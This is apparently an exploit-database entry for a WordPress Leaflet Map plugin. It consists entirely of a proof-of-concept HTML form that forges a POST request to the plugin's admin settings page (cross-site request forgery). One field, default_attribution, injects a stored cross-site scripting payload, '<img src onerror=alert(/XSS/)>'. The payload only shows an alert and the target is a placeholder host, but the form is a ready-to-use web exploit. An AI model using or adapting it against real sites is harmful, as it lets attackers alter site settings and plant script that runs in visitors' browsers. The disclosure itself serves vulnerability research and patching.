Share
## https://sploitus.com/exploit?id=WPEX-ID:AC32D265-066E-49EC-9042-3145CD99E2E8
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=leaflet-map" method="POST">
      <input type="hidden" name="default_lat" value="44.67" />
      <input type="hidden" name="default_lng" value="-63.61" />
      <input type="hidden" name="default_zoom" value="12" />
      <input type="hidden" name="default_height" value="250" />
      <input type="hidden" name="default_width" value="100%" />
      <input type="hidden" name="default_min_zoom" value="0" />
      <input type="hidden" name="default_max_zoom" value="20" />
      <input type="hidden" name="default_tiling_service" value="other" />
      <input type="hidden" name="mapquest_appkey" value="Supply an API key if you choose MapQuest" />
      <input type="hidden" name="map_tile_url" value="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" />
      <input type="hidden" name="map_tile_url_subdomains" value="abc" />
      <input type="hidden" name="tilesize" value="" />
      <input type="hidden" name="mapid" value="" />
      <input type="hidden" name="accesstoken" value="" />
      <input type="hidden" name="zoomoffset" value="" />
      <input type="hidden" name="js_url" value="https://unpkg.com/leaflet@1.7.1/dist/leaflet.js" />
      <input type="hidden" name="css_url" value="https://unpkg.com/leaflet@1.7.1/dist/leaflet.css" />
      <input type="hidden" name="default_attribution" value="<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="geocoder" value="osm" />
      <input type="hidden" name="google_appkey" value="Supply a Google API Key" />
      <input type="hidden" name="togeojson_url" value="https://unpkg.com/@mapbox/togeojson@0.16.0/togeojson.js" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>